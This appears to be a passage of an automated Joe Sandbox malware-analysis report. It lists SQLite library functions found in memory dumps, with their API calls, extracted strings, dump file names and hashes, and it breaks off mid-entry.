sqlite3_str_appendf.SQLITE3 ref: 61E24175
sqlite3_str_appendf.SQLITE3 ref: 61E241CF
sqlite3_str_appendf.SQLITE3 ref: 61E24238
sqlite3_str_appendf.SQLITE3 ref: 61E24257
sqlite3_str_appendf.SQLITE3 ref: 61E2428A
sqlite3_str_appendf.SQLITE3 ref: 61E242CD
sqlite3_str_append.SQLITE3 ref: 61E242EA
sqlite3_str_appendall.SQLITE3 ref: 61E24306

Strings

Xya, xrefs: 61E242DC
(blob), xrefs: 61E24263
ya, xrefs: 61E2415E
program, xrefs: 61E2431B
bua, xrefs: 61E24116
ya, xrefs: 61E24143
NULL, xrefs: 61E24268
bua, xrefs: 61E24138

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_str_appendf$sqlite3_str_appendsqlite3_str_appendallstrcmp
String ID: ya$ya$(blob)$NULL$Xya$bua$bua$program
API String ID: 1119808141-2454903709
Opcode ID: cbc3aaea12784290ab62c48c2c95f61db08f5ca31477116b22b62eb8c8fb6942
Instruction ID: 2c8c45d9fea84d83381aca31534329f351a63baa979489b0945b721b6e94553d
Opcode Fuzzy Hash: cbc3aaea12784290ab62c48c2c95f61db08f5ca31477116b22b62eb8c8fb6942
Instruction Fuzzy Hash: 067127B0A09346DFC704CFA9C591659BBF0BF8A704F25C85EE8999B750D334D881CB92

Function 61E44BAA Relevance: 30.1, APIs: 15, Strings: 2, Instructions: 301COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E44BBC
sqlite3_mprintf.SQLITE3 ref: 61E44C08
sqlite3_free.SQLITE3 ref: 61E44C8C

Part of subcall function 61E0AE03: sqlite3_mutex_enter.SQLITE3 ref: 61E0AE22

sqlite3_free.SQLITE3 ref: 61E44E55
sqlite3_mprintf.SQLITE3 ref: 61E44C71

Part of subcall function 61E42CCC: sqlite3_initialize.SQLITE3 ref: 61E42CD2
Part of subcall function 61E42CCC: sqlite3_vmprintf.SQLITE3 ref: 61E42CEC

sqlite3_malloc64.SQLITE3 ref: 61E44CDF
sqlite3_strnicmp.SQLITE3 ref: 61E44D31
sqlite3_malloc64.SQLITE3 ref: 61E44DE4
sqlite3_snprintf.SQLITE3 ref: 61E44E12
sqlite3_free.SQLITE3 ref: 61E44E42
sqlite3_mprintf.SQLITE3 ref: 61E44E99
sqlite3_free.SQLITE3 ref: 61E44EA9
sqlite3_malloc64.SQLITE3 ref: 61E44F54
sqlite3_snprintf.SQLITE3 ref: 61E44F84
sqlite3_mutex_leave.SQLITE3 ref: 61E44FB3

Strings

te3_, xrefs: 61E44D0B
sqlite3_extension_init, xrefs: 61E44C1B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free$sqlite3_malloc64sqlite3_mprintf$sqlite3_mutex_entersqlite3_snprintf$sqlite3_initializesqlite3_mutex_leavesqlite3_strnicmpsqlite3_vmprintf
String ID: sqlite3_extension_init$te3_
API String ID: 1468712754-3968575867
Opcode ID: 6e0e90a19a78a07d61414acf139274a8cff7841912b20406d0ec3bbb20be9f54
Instruction ID: 13e332b18d3c636b40fc61387a71e09be565dfa7e501f11a1ced44763011973f
Opcode Fuzzy Hash: 6e0e90a19a78a07d61414acf139274a8cff7841912b20406d0ec3bbb20be9f54
Instruction Fuzzy Hash: 8BD1E5B4A092469FDB00DFA8D58479DBBF1FF88314F25C52AE898AB350D734D981CB51

Function 61E446F2 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 346COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E44740
sqlite3_malloc64.SQLITE3 ref: 61E44774
memcmp.MSVCRT ref: 61E447F2
memcmp.MSVCRT ref: 61E449B6
memcmp.MSVCRT ref: 61E44A03
sqlite3_mprintf.SQLITE3 ref: 61E44A2A
memcmp.MSVCRT ref: 61E44A67
memcmp.MSVCRT ref: 61E44A9B
sqlite3_mprintf.SQLITE3 ref: 61E44AE7
sqlite3_malloc64.SQLITE3 ref: 61E44B15
sqlite3_vfs_find.SQLITE3 ref: 61E44B53
sqlite3_mprintf.SQLITE3 ref: 61E44B6F
sqlite3_free_filename.SQLITE3 ref: 61E44B84

Strings

cache, xrefs: 61E44A94, 61E44AB2
access, xrefs: 61E449CD
@, xrefs: 61E4470F

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: memcmp$sqlite3_mprintf$sqlite3_malloc64$sqlite3_free_filenamesqlite3_vfs_find
String ID: @$access$cache
API String ID: 4214946475-1361544076
Opcode ID: ab7ad46901fae04c60c4c8f6e6fafcdc1ac4b234ab5e6e200d9af0bc62e72ad9
Instruction ID: 24be394d38da71e63c8a7042d5188c1cb1b21c8f237fd1d91a02c4254cd669c7
Opcode Fuzzy Hash: ab7ad46901fae04c60c4c8f6e6fafcdc1ac4b234ab5e6e200d9af0bc62e72ad9
Instruction Fuzzy Hash: 8AD170B4A083868FEB11CFA8D58079DBBF1AF89318F28C41ED895AB345D735D442DB52

Function 61E9555F Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

sqlite3_stricmp.SQLITE3 ref: 61E95591
sqlite3_table_column_metadata.SQLITE3 ref: 61E955DC

Part of subcall function 61E8CCB3: sqlite3_mutex_enter.SQLITE3 ref: 61E8CCCC
Part of subcall function 61E8CCB3: sqlite3_mutex_leave.SQLITE3 ref: 61E8CF0C

sqlite3_mprintf.SQLITE3 ref: 61E955FA
sqlite3_mprintf.SQLITE3 ref: 61E95648
sqlite3_prepare_v2.SQLITE3 ref: 61E95693
sqlite3_free.SQLITE3 ref: 61E9569D
sqlite3_step.SQLITE3 ref: 61E956F6
sqlite3_column_bytes.SQLITE3 ref: 61E9570E
sqlite3_reset.SQLITE3 ref: 61E95720
sqlite3_finalize.SQLITE3 ref: 61E95791
sqlite3_step.SQLITE3 ref: 61E957E7
sqlite3_column_bytes.SQLITE3 ref: 61E957FF
sqlite3_column_text.SQLITE3 ref: 61E95814
sqlite3_reset.SQLITE3 ref: 61E95823
sqlite3_column_int.SQLITE3 ref: 61E95874

Strings

sqlite_stat1, xrefs: 61E95586

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_column_bytessqlite3_mprintfsqlite3_resetsqlite3_step$sqlite3_column_intsqlite3_column_textsqlite3_finalizesqlite3_freesqlite3_mutex_entersqlite3_mutex_leavesqlite3_prepare_v2sqlite3_stricmpsqlite3_table_column_metadata
String ID: sqlite_stat1
API String ID: 2333784975-692927832
Opcode ID: 9b8c1f68e190d3356f9fc27f870dd2ee12c6e154cb89dc610e8f557099343992
Instruction ID: e5f4ec7dd73cf1844e77f992ecc8c8e721b860735dacf7401275642d0e5b42c2
Opcode Fuzzy Hash: 9b8c1f68e190d3356f9fc27f870dd2ee12c6e154cb89dc610e8f557099343992
Instruction Fuzzy Hash: 4DA1E2B4A0530ADFDB00DFA9D58079EBBF1BF89318F20882AE8549B350D775D841CB91

Function 61E1F1D7 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 224COMMON

Download Yara Rule

APIs

sqlite3_str_append.SQLITE3 ref: 61E1F257
sqlite3_str_append.SQLITE3 ref: 61E1F26F
sqlite3_str_append.SQLITE3 ref: 61E1F2AF
sqlite3_str_appendf.SQLITE3 ref: 61E1F2D9

Part of subcall function 61E1A625: sqlite3_str_vappendf.SQLITE3 ref: 61E1A63F

sqlite3_str_append.SQLITE3 ref: 61E1F324
sqlite3_str_appendf.SQLITE3 ref: 61E1F3BD
sqlite3_str_appendf.SQLITE3 ref: 61E1F44F
sqlite3_str_appendf.SQLITE3 ref: 61E1F481
sqlite3_str_append.SQLITE3 ref: 61E1F4A0
sqlite3_str_appendf.SQLITE3 ref: 61E1F4C7
sqlite3_str_append.SQLITE3 ref: 61E1F4E1
sqlite3_str_reset.SQLITE3 ref: 61E1F4F7

Strings

@va, xrefs: 61E1F3AE
NULL, xrefs: 61E1F39B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_str_append$sqlite3_str_appendf$sqlite3_str_resetsqlite3_str_vappendf
String ID: @va$NULL
API String ID: 4035452181-680550993
Opcode ID: c66765a97ef9319c864240b46d4529ee09309bfaef9a0effdbffe79e79a8fb36
Instruction ID: d3db0d74fe58c64ae056f703097d17a113456cd941b0cca559994f2f593ee4c6
Opcode Fuzzy Hash: c66765a97ef9319c864240b46d4529ee09309bfaef9a0effdbffe79e79a8fb36
Instruction Fuzzy Hash: 60A1E1B49083498FDB10CFA8C58579DBBF0AF89708F24C45ED4989B259D778D889CF91

Function 61E1D2E7 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 92COMMON

Download Yara Rule

APIs

sqlite3_str_append.SQLITE3 ref: 61E1D31C
sqlite3_str_append.SQLITE3 ref: 61E1D339
sqlite3_str_append.SQLITE3 ref: 61E1D35B
sqlite3_str_appendall.SQLITE3 ref: 61E1D376
sqlite3_str_append.SQLITE3 ref: 61E1D395
sqlite3_str_append.SQLITE3 ref: 61E1D3AC
sqlite3_str_append.SQLITE3 ref: 61E1D3C9
sqlite3_str_append.SQLITE3 ref: 61E1D3EB
sqlite3_str_append.SQLITE3 ref: 61E1D404

Strings

>va, xrefs: 61E1D3F8
<va, xrefs: 61E1D418

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_str_append$sqlite3_str_appendall
String ID: <va$>va
API String ID: 851024535-1867133245
Opcode ID: 6fa9d2e3239a7e820a0bd22f2cd775d5115a9d73bf37a22174aa29f64e2c07e4
Instruction ID: e3ef76b6f026bdd85544d34a6c8896a515197761f8795daddb241d2343451aa7
Opcode Fuzzy Hash: 6fa9d2e3239a7e820a0bd22f2cd775d5115a9d73bf37a22174aa29f64e2c07e4
Instruction Fuzzy Hash: CC311DB580C7159FC7009F5DC68A39EBBE0FB84758F61C81DE8A85B288D775C486CB92

Function 61E74C89 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 209COMMON

Download Yara Rule

APIs

Part of subcall function 61E2D0E5: sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 61E2D126

sqlite3_mutex_enter.SQLITE3 ref: 61E74CC9
sqlite3_prepare_v2.SQLITE3 ref: 61E74D04
sqlite3_step.SQLITE3 ref: 61E74D37
sqlite3_errmsg.SQLITE3 ref: 61E74EFF
sqlite3_mutex_leave.SQLITE3 ref: 61E74F3E

Part of subcall function 61E2C560: sqlite3_log.SQLITE3 ref: 61E2C589

Strings

d, xrefs: 61E74E7B
bua, xrefs: 61E74CBB

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_log$sqlite3_errmsgsqlite3_mutex_entersqlite3_mutex_leavesqlite3_prepare_v2sqlite3_step
String ID: bua$d
API String ID: 2909166478-553894406
Opcode ID: 5cdbc31774d0ee79a5ec995a1b580bf3ade0689a3008dd6521c62523cdd6b090
Instruction ID: 5e4e5b1b263f40a194b0e8318f6f9d4bb32e2e67fcdf3ac5b7657d14f1674866
Opcode Fuzzy Hash: 5cdbc31774d0ee79a5ec995a1b580bf3ade0689a3008dd6521c62523cdd6b090
Instruction Fuzzy Hash: 2D811C70A083598BEB11DFA9C48479EBBF5EF89358F21C82AE8649B340D774D445CF51

Function 61E878D0 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_stricmp.SQLITE3 ref: 61E878F3
sqlite3_mprintf.SQLITE3 ref: 61E87907

Part of subcall function 61E42CCC: sqlite3_initialize.SQLITE3 ref: 61E42CD2
Part of subcall function 61E42CCC: sqlite3_vmprintf.SQLITE3 ref: 61E42CEC

sqlite3_prepare_v2.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E879F9
sqlite3_free.SQLITE3 ref: 61E87A04

Strings

bua, xrefs: 61E87983
WHERE , xrefs: 61E87975
sqlite_stat1, xrefs: 61E878E5
IS ?, xrefs: 61E879B0
SELECT * FROM , xrefs: 61E8792B
AND , xrefs: 61E879C8

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_freesqlite3_initializesqlite3_mprintfsqlite3_prepare_v2sqlite3_stricmpsqlite3_vmprintf
String ID: AND $ IS ?$ WHERE $SELECT * FROM $bua$sqlite_stat1
API String ID: 1729383143-2971817247
Opcode ID: 7966b2053d61474f482c633d2765ed9f02e550354b0b9c1dc43fd62f93520a80
Instruction ID: d5fe4e79c361bb1f87e034d05748e5cd7e47e932773f441eb89fea65eec67a9f
Opcode Fuzzy Hash: 7966b2053d61474f482c633d2765ed9f02e550354b0b9c1dc43fd62f93520a80
Instruction Fuzzy Hash: 67310A70B082498BCB019FA9D58068EBAF1BFD8358F65C43DE458AB344C774ED4A8B95

Function 61E0F4E0 Relevance: 16.6, APIs: 11, Instructions: 54COMMON

Download Yara Rule

APIs

sqlite3_free.SQLITE3 ref: 61E0F502
sqlite3_free.SQLITE3 ref: 61E0F50D
sqlite3_free.SQLITE3 ref: 61E0F521
sqlite3_free.SQLITE3 ref: 61E0F52B
sqlite3_free.SQLITE3 ref: 61E0F536
sqlite3_free.SQLITE3 ref: 61E0F541
sqlite3_free.SQLITE3 ref: 61E0F54C
sqlite3_free.SQLITE3 ref: 61E0F557
sqlite3_free.SQLITE3 ref: 61E0F562
sqlite3_free.SQLITE3 ref: 61E0F56D
sqlite3_free.SQLITE3 ref: 61E0F575

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_free
String ID:
API String ID: 2313487548-0
Opcode ID: 7d93a01135467c64a71153db960ea9e88013ae4958c6b3df83db3ebc04058e7a
Instruction ID: f912d5d4051505f5ea4965186cec4056c25b206f33fa09e8c2c92a13a0eb0592
Opcode Fuzzy Hash: 7d93a01135467c64a71153db960ea9e88013ae4958c6b3df83db3ebc04058e7a
Instruction Fuzzy Hash: 9E1189749487468BCB00AFB8C0C4919BBE4EF88215B528D9DEC848F315D774DCE18BC1

Function 61E2CAEF Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

sqlite3_create_function.SQLITE3 ref: 61E2CB36
sqlite3_create_function.SQLITE3 ref: 61E2CB7E
sqlite3_create_function.SQLITE3 ref: 61E2CBC6

Part of subcall function 61E23B83: sqlite3_mutex_enter.SQLITE3 ref: 61E23BA0
Part of subcall function 61E23B83: sqlite3_mutex_leave.SQLITE3 ref: 61E23BDE

sqlite3_create_function.SQLITE3 ref: 61E2CC7B
sqlite3_create_function.SQLITE3 ref: 61E2CCC1

Strings

geopoly, xrefs: 61E2CCDE
`^a, xrefs: 61E2CCD9
rtree, xrefs: 61E2CBE7
rtree_i32, xrefs: 61E2CC0F

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_create_function$sqlite3_mutex_entersqlite3_mutex_leave
String ID: `^a$geopoly$rtree$rtree_i32
API String ID: 1363696727-3051938310
Opcode ID: 538aca0cdc86564761f1f8a51c6c7d63b57378f2a24d1daeb975fc12a9614d45
Instruction ID: 00023898983c851ccb0e0f5be96a1c8fd2865c0c5527be677903ebc2c0754984
Opcode Fuzzy Hash: 538aca0cdc86564761f1f8a51c6c7d63b57378f2a24d1daeb975fc12a9614d45
Instruction Fuzzy Hash: 7B4181B06083429AE301DF21C56670BBFE0BF85758F21C92CE4958B381D3BAD949CF82

Function 61E21E8B Relevance: 15.2, APIs: 10, Instructions: 203COMMON

Download Yara Rule

APIs

sqlite3_value_text.SQLITE3 ref: 61E21EAA
sqlite3_value_bytes.SQLITE3 ref: 61E21EBF
sqlite3_value_text.SQLITE3 ref: 61E21ECD
sqlite3_value_bytes.SQLITE3 ref: 61E21EFF
sqlite3_value_text.SQLITE3 ref: 61E21F0D
sqlite3_value_bytes.SQLITE3 ref: 61E21F23
memcmp.MSVCRT ref: 61E21FAA
sqlite3_result_error_toobig.SQLITE3 ref: 61E2200B

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_value_bytessqlite3_value_text$memcmpsqlite3_result_error_toobig
String ID:
API String ID: 3428878466-0
Opcode ID: df1a7f1bfc85b03195a7074a86c3e0f9bb3faf14b4e4cc7d1db0666fd4595a90
Instruction ID: d7e7f6ccb818037cd47a270a33e128475e96ff0db0c02e8a63a0b15a44a5f546
Opcode Fuzzy Hash: df1a7f1bfc85b03195a7074a86c3e0f9bb3faf14b4e4cc7d1db0666fd4595a90
Instruction Fuzzy Hash: 9881F571E042598FCB00DFA9D990A9DBBF2BF48324F258529E854EB354D735E845CF90

Function 61E0B567 Relevance: 15.1, APIs: 10, Instructions: 77COMMON

Download Yara Rule

APIs

sqlite3_mutex_enter.SQLITE3 ref: 61E0B58B
sqlite3_mutex_enter.SQLITE3 ref: 61E0B5B4
sqlite3_free.SQLITE3 ref: 61E0B5DD
sqlite3_mutex_leave.SQLITE3 ref: 61E0B5F4
sqlite3_mutex_enter.SQLITE3 ref: 61E0B601
sqlite3_free.SQLITE3 ref: 61E0B61D
sqlite3_mutex_leave.SQLITE3 ref: 61E0B628
sqlite3_mutex_free.SQLITE3 ref: 61E0B633
sqlite3_free.SQLITE3 ref: 61E0B63B
sqlite3_mutex_leave.SQLITE3 ref: 61E0B648

Memory Dump Source

Source File: 00000008.00000002.879441527.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000008.00000002.879436671.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879462405.0000000061EB4000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879467473.0000000061EB7000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879485563.0000000061ECC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879497724.0000000061ECD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879511581.0000000061ED0000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879525777.0000000061ED3000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000008.00000002.879542881.0000000061ED4000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd

Similarity

API ID: sqlite3_freesqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_free
String ID:
API String ID: 1218951731-0
Opcode ID: 2e5e3aaccfb881f83326e9133b84d88ad3ce1c2bf61a48c902a9eb6077d98689
